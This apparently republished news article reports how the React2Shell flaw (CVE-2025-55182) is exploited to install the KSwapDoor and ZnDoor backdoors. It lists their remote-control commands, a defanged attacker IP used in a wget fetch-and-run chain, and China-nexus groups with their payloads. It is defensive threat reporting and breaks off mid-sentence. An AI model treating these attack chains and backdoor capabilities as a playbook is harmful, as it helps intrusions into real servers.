The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security.

“KSwapDoor is a professionally engineered remote access tool designed with stealth in mind,” Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement.

“It builds an internal mesh network, allowing compromised servers to talk to each other and evade security blocks. It uses military-grade encryption to hide its communications and, most alarmingly, features a ‘sleeper’ mode that lets attackers bypass firewalls by waking the malware up with a secret, invisible signal.”

The cybersecurity company noted that it was previously mistakenly classified as BPFDoor, adding that the Linux backdoor offers interactive shell, command execution, file operations and lateral movement scanning capabilities. It also impersonates a legitimate Linux kernel swap daemon to evade detection.

In a related development, NTT Security said organizations in Japan are being targeted by cyber attacks exploiting React2Shell to deploy ZnDoor, a malware that’s been assessed to be detected in the wild since December 2023. The attack chains involve running a bash command to fetch the payload from a remote server (45.76.155[.]14) using wget and executing it.

Cybersecurity

A remote access trojan, it contacts the same threat actor-controlled infrastructure to receive commands and execute them on the host. Some of the supported commands are listed below –

  • shell, to execute a command
  • interactive_shell, to launch an interactive shell
  • explorer, to get a list of directories
  • explorer_cat, to read and display a file
  • explorer_delete, to delete a file
  • explorer_upload, to download a file from the server
  • explorer_download, to send files to the server
  • system, to gather system information
  • change_timefile, to change the timestamp of a file
  • socket_quick_startstreams, to start a SOCKS5 proxy
  • start_in_port_forward, to start port forwarding
  • stop_in_port, to stop port forwarding

The disclosure comes as the vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), has been exploited by multiple threat actors, Google identifying at least five China-nexus groups that have weaponized to deliver an array of payloads –

  • UNC6600 to deliver a tunneling utility named MINOCAT
  • UNC6586 to deliver a downloader named SNOWLIGHT
  • UNC6588 to deliver a backdoor named COMPOOD
  • UNC6603 to deliver an updated version of a Go backdoor named HISONIC that uses Cloudflare Pages and GitLab to retrieve encrypted configuration and blend in with legitimate network activity
  • UNC6595 to deliver a Linux version of ANGRYREBEL (aka Noodle RAT)

Microsoft, in its own advisory for CVE-2025-55182, said threat actors have taken advantage of the flaw to run arbitrary commands for post-exploitation, including setting up reverse shells to known Cobalt Strike servers, and then dropping remote…


Source link

Disclaimer

We strive to uphold the highest ethical standards in all of our reporting and coverage. We blogs.grocliq.com want to be transparent with our readers about any potential conflicts of interest that may arise in our work. It’s possible that some of the investors we feature may have connections to other businesses, including competitors or companies we write about. However, we want to assure our readers that this will not have any impact on the integrity or impartiality of our reporting. We are committed to delivering accurate, unbiased news and information to our audience, and we will continue to uphold our ethics and principles in all of our work. Thank you for your trust and support.

Website Upgradation is going on for any glitch kindly connect at [email protected]

 

 

Categorized in:

Blog,

Last Update: December 16, 2025